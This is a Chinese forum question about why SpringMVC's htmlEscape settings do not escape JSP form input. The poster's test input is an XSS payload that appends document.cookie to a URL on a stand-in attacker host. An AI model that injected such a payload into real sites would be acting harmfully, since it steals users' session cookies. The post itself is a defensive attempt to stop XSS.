SpringMVC: HtmlEscape 设置没起作用怎么回事?

发布于 2022-09-06 06:03:51 字数 929 浏览 27 评论 0

项目用的是 SpringMVC+jsp

想要对提交表格的内容进行字符转义防止 XSS 攻击

根据 http://www.codeweblog.com/spr...

做处理,下面三条都做了

1)web.xml 中添加

 <context-param>     <param-name>defaultHtmlEscape</param-name>      <param-value>true</param-value> </context-param>

2)在包含 form 的 jsp 页面中添加

 <spring:htmlEscape defaultHtmlEscape="true" />
 

3 )直接在 form 中的元素中添加

 <form:input path="someFormField" htmlEscape="true" />或<form:form htmlEscape="true">

然后在表格上添加

<script>document.getElementById('attacker').href='http://www.attacker_741.com/r...'+document.cookie;</script>

发现存进数据库的没有转移,依然是原文

怎么回事啊?

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(1

菩提树下叶撕阳。 2022-09-13 06:03:51

现在解决了吗?

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文